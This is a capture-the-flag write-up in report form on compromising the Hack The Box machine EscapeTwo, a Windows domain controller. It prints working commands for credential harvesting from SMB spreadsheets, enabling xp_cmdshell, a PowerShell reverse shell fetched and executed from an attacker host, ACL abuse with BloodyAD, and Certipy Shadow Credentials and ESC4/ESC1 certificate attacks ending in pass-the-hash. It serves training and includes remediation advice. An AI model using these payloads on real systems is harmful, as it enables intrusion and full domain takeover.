Hack The Box — EscapeTwo

Easy | Windows | Hack The Box

---

Field	Value
Report Date	24 May 2026
Assessed By	RobInTheHood
Target IP	10.129.232.128
Hostname	DC01
Domain	sequel.htb

---

Table of Contents

1. Executive Summary
2. Scope
3. Methodology
4. Attack Chain Summary
5. Findings
6. Proof of Access
7. Credentials Discovered
8. Impact Assessment
9. Remediation Summary
10. Key Takeaways
11. Tools Used
12. Disclaimer

---

1. Executive Summary

This report documents the compromise workflow for the Hack The Box machine EscapeTwo. The objective was to obtain domain-administrator-level access in an authorised lab environment and document the attack path with reproducible evidence.

Pre-supplied credentials (rose:KxEPkKe6R8su) expose an SMB share called Accounting Department containing Excel spreadsheets that disclose credentials for several accounts, including the MSSQL sa account. Authenticating to the SQL Express instance as sa allows xp_cmdshell to be enabled, delivering a reverse shell as sql_svc. A plaintext password stored in the SQL installation configuration file is reused by the domain account ryan, granting WinRM access and the user flag.

BloodHound reveals that ryan holds WriteOwner over the ca_svc service account. This is leveraged with BloodyAD to grant GenericAll, enabling a Shadow Credentials attack via Certipy that returns ca_svc’s NT hash. Re-running Certipy as ca_svc uncovers an ESC4-vulnerable certificate template (DunderMifflinAuthentication). The template is rewritten to ESC1 configuration, a certificate is requested for the administrator UPN, and the resulting PFX is used to extract the administrator’s NT hash — completing full domain compromise via pass-the-hash.

---

2. Scope

Field	Value
Target IP	10.129.232.128
Hostname	DC01
Domain	sequel.htb
Operating System	Windows Server 2019 Build 17763
Machine Rating	Easy
Environment	Hack The Box — Authorised Training Lab
Assessment Date	24 May 2026
Assessor	RobInTheHood

---

3. Methodology

• Reconnaissance — service discovery and external attack-surface mapping
• Enumeration — credential, configuration, and trust-path analysis
• Exploitation — initial access through validated vulnerability paths
• Lateral Movement — privilege pivoting and cross-context execution
• Privilege Escalation — full compromise to domain-administrator context
• Post-Exploitation — proof collection and impact-oriented validation

---

4. Attack Chain Summary

Phase	Technique	MITRE ATT&CK
Recon	Nmap — DC port profile (53/88/389/445/1433)	T1046
Enumeration	SMB share listing with rose → Accounting Department share → Excel credential dump	T1021.002
Enumeration	LDAP user enumeration → BloodHound collection	T1087.002
Initial Access	MSSQL sa login → xp_cmdshell → PowerShell reverse shell as sql_svc	T1059.001 · T1190
Credential Access	Plaintext password in sql-Configuration.INI	T1552.001
Lateral Movement	Password reuse — ryan WinRM with sql_svc password	T1078
Privilege Escalation	WriteOwner on ca_svc → GenericAll → Shadow Credentials → NT hash	T1484.001 · T1649
Privilege Escalation	ESC4 template → rewrite to ESC1 → cert for administrator UPN → pass-the-hash	T1649 · T1550.002

---

5. Findings

F-01 — Technical Walkthrough

Reconnaissance

Because the target is a domain controller, Kerberos time-skew restrictions apply. The clock is synchronised before any Kerberos-dependent tool is used:

faketime "$(rdate -n $TARGET -p | awk '{print $2, $3, $4}' | date -f - "+%Y-%m-%d %H:%M:%S")" zsh

nmap -sC -sV -F $TARGET -oN nmap.txt

Port	Service
53/tcp	DNS
88/tcp	Kerberos
135/tcp	RPC
139/tcp	NetBIOS
389/tcp	LDAP
445/tcp	SMB
1433/tcp	MS-SQL

The port profile is consistent with a Windows domain controller. The presence of MS-SQL on 1433 alongside SMB is immediately notable.

---

Enumeration — SMB

Using the supplied credentials, the available shares are listed:

nxc smb "$TARGET" -u "rose" -p "KxEPkKe6R8su" --shares

Accounting Department   READ
ADMIN$                  Remote Admin
C$                      Default share
IPC$          READ      Remote IPC
NETLOGON      READ      Logon server share
SYSVOL        READ      Logon server share
Users         READ

The Accounting Department share stands out as a non-default readable share. Connecting to it reveals two Excel spreadsheets:

smbclient //"$TARGET"/"Accounting Department" --user=rose --password=KxEPkKe6R8su

accounting_2024.xlsx    10217  Sun Jun  9 06:14:49 2024
accounts.xlsx            6780  Sun Jun  9 06:52:07 2024

After downloading and inspecting both files, the following credentials are extracted:

angela@sequel.htb  : 0fwz7Q4mSpurIt99
oscar@sequel.htb   : 86LxLBMgEWaKUnBG
kevin@sequel.htb   : Md9Wlq1E5bZnVDVo
sa@sequel.htb      : MSSQLP@ssw0rd!

---

Enumeration — LDAP & BloodHound

nxc ldap $TARGET -u 'rose' -p 'KxEPkKe6R8su' --users

Administrator   Built-in administrator
Guest
krbtgt
michael
ryan
oscar
sql_svc
rose
ca_svc

BloodHound data is collected for deeper ACL analysis:

nxc ldap $TARGET -u 'rose' -p 'KxEPkKe6R8su' -d "sequel.htb" -k \
    --bloodhound -c All --dns-server 10.129.232.128

Two service accounts are particularly interesting: sql_svc and ca_svc. A Kerberoasting attempt against SPNs yields hashes, but none are crackable offline.

---

Initial Access — MSSQL xp_cmdshell

The sa credentials from the Excel files are used to authenticate to the SQL Express instance:

mssqlclient.py sequel.htb/sa:'MSSQLP@ssw0rd!'@10.129.232.128
SQL (sa  dbo@master)>

xp_cmdshell is enabled through the advanced configuration options:

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC master..xp_cmdshell 'whoami'

sequel\sql_svc

A PowerShell reverse shell payload is hosted on a local HTTP server:

# shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.141",4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + "PS " + (pwd).Path + "> "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}

The payload is downloaded and executed via SQL:

EXEC master..xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.141:8080/shell.ps1'')"'

A reverse shell as sequel\sql_svc is received on the listener.

---

Credential Access — SQL Installation Configuration

With a shell as sql_svc, the SQL Server installation directory is browsed. The unattended installation configuration file retains plaintext credentials:

C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI

SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"

---

Lateral Movement — Password Reuse to ryan

The C:\Users directory shows a profile for ryan. The sql_svc password is tested against ryan’s account over WinRM:

nxc winrm "$TARGET" -u 'ryan' -p 'WqSZAF6CysDQbGb3'

WINRM  10.129.232.128  5985  DC01  [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (admin)

evil-winrm -u "ryan" -p "WqSZAF6CysDQbGb3" -i "$TARGET"

User Flag

*Evil-WinRM* PS C:\Users\ryan> type "C:/Users/ryan/Desktop/user.txt"
71faafbb8336f7a44c5a8430843c8b97

---

Privilege Escalation — WriteOwner on ca_svc → Shadow Credentials

BloodHound shows that ryan holds WriteOwner on the ca_svc service account. This ACL chain is exploited in two steps using BloodyAD.

Step 1 — Take ownership of ca_svc:

bloodyad -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 \
    -H dc01.sequel.htb --dns 10.129.232.128 set owner ca_svc ryan

[+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on ca_svc

Step 2 — Grant GenericAll to ryan over ca_svc:

bloodyad -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 \
    -H dc01.sequel.htb --dns 10.129.232.128 add genericAll ca_svc ryan

[+] ryan has now GenericAll on ca_svc

With full control, a Shadow Credentials attack is performed. Certipy adds a Key Credential to ca_svc, authenticates with the generated certificate, and returns the account’s NT hash:

certipy shadow auto -u ryan@sequel.htb -p WqSZAF6CysDQbGb3 \
    -account ca_svc -dc-ip 10.129.232.128

[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce

---

Privilege Escalation — ESC4 → ESC1 → Administrator Certificate

Certipy is re-run as ca_svc to enumerate vulnerable certificate templates:

certipy find -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e20bc2b7fce \
    -dc-ip 10.129.232.128 -vulnerable -stdout

The DunderMifflinAuthentication template is flagged as ESC4 — ca_svc (a member of Cert Publishers) holds dangerous write permissions over it.

[!] Vulnerabilities
  ESC4 : User has dangerous permissions.

The template is rewritten to the default ESC1 configuration, enabling subject alternative name (SAN) specification by the enrolee:

certipy template -u ca_svc@sequel.htb \
    -hashes 3b181b914e7a9d5508ea1e20bc2b7fce \
    -template DunderMifflinAuthentication \
    -write-default-configuration -no-save

A certificate is requested impersonating the administrator account via UPN:

certipy req -u ca_svc@sequel.htb \
    -hashes 3b181b914e7a9d5508ea1e20bc2b7fce \
    -ca sequel-DC01-CA \
    -template DunderMifflinAuthentication \
    -upn administrator@sequel.htb

[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Saving certificate and private key to 'administrator.pfx'

The PFX is used to authenticate and recover the administrator NT hash:

certipy auth -pfx administrator.pfx -dc-ip 10.129.232.128

[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff

---

Root Flag

evil-winrm -u "administrator" -H 7a8d4e04986afa8ed4060f75e5a0b3ff -i 10.129.232.128

*Evil-WinRM* PS C:\Users\Administrator> type "C:/Users/Administrator/Desktop/root.txt"
bfaf53a902a9cdd4a5c7db3f1348a030

---

6. Proof of Access

Level	Evidence
User	71faafbb8336f7a44c5a8430843c8b97
Root / Administrator	bfaf53a902a9cdd4a5c7db3f1348a030

---

7. Credentials Discovered

Account	Secret	Type	Source
rose	KxEPkKe6R8su	Domain password	Pre-supplied
angela	0fwz7Q4mSpurIt99	Domain password	accounts.xlsx SMB share
oscar	86LxLBMgEWaKUnBG	Domain password	accounts.xlsx SMB share
kevin	Md9Wlq1E5bZnVDVo	Domain password	accounts.xlsx SMB share
sa	MSSQLP@ssw0rd!	MSSQL password	accounts.xlsx SMB share
sql_svc	WqSZAF6CysDQbGb3	Domain password	sql-Configuration.INI plaintext
ryan	WqSZAF6CysDQbGb3	Domain password	Password reuse from sql_svc
ca_svc	3b181b914e7a9d5508ea1e20bc2b7fce	NT hash	Shadow Credentials
administrator	7a8d4e04986afa8ed4060f75e5a0b3ff	NT hash	ESC4 → ESC1 ADCS abuse

---

8. Impact Assessment

Successful exploitation resulted in complete domain compromise through a multi-stage chain. Sensitive credentials stored in accessible SMB shares provided a foothold into the MSSQL service tier. Misuse of xp_cmdshell bridged the database to OS-level code execution. A plaintext password preserved in an installation configuration file enabled lateral movement to a domain user with privileged ADCS ACLs. The combination of WriteOwner, Shadow Credentials, and a write-vulnerable certificate template allowed full domain controller compromise without ever touching a password cracker or network exploit.

---

9. Remediation Summary

Priority	Action
Critical	Remove credentials from the Accounting Department SMB share and store them in a secrets manager; restrict share access to only required personnel.
Critical	Disable xp_cmdshell on all MSSQL instances; enforce the principle of least privilege — the sa account should not be operational.
Critical	Delete or sanitise sql-Configuration.INI and similar unattended installation files that retain plaintext passwords after deployment.
High	Audit ADCS template permissions; remove Write rights for non-administrative principals over certificate templates.
High	Review ACL delegations on service accounts (WriteOwner, GenericAll); remove ryan’s WriteOwner over ca_svc.
High	Enforce unique passwords across service and user accounts to prevent credential reuse pivots.
Medium	Enable LDAP signing and channel binding to impede BloodHound-style unauthenticated ACL enumeration.

---

10. Key Takeaways

• Readable file shares are high-value targets even when they appear administrative — spreadsheets routinely contain credentials with wider domain impact than the share permissions suggest.
• Unattended installation files (*.INI, *.xml, unattend.xml) frequently preserve plaintext credentials long after deployment; they should be purged from production systems as a post-install step.
• ACL-based attacks via BloodyAD require no exploit and no vulnerability — only a misconfigured delegation. WriteOwner → GenericAll → Shadow Credentials is a deterministic, low-noise path to credential recovery.
• ESC4 is often overlooked in favour of higher-profile ADCS misconfigurations. The ability to rewrite a template’s configuration transforms it into ESC1 on demand, making any ESC4 finding effectively equivalent to ESC1 from an impact standpoint.
• Pass-the-hash over WinRM remains a reliable final step on Windows environments that have not enforced Protected Users or Credential Guard.

---

11. Tools Used

Tool	Purpose
nmap	Port and service discovery
nxc (NetExec)	SMB share enumeration, LDAP user enumeration, WinRM authentication testing
smbclient	SMB share browsing and file download
mssqlclient.py	MSSQL authentication and xp_cmdshell execution
BloodHound	ACL and attack-path analysis in Active Directory
BloodyAD	WriteOwner and GenericAll ACL manipulation
Certipy	Shadow Credentials, ADCS template enumeration, ESC4/ESC1 exploitation
evil-winrm	WinRM shell and pass-the-hash authentication

---

12. Disclaimer

This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.

---

End of Report — EscapeTwo | RobInTheHood | 24 May 2026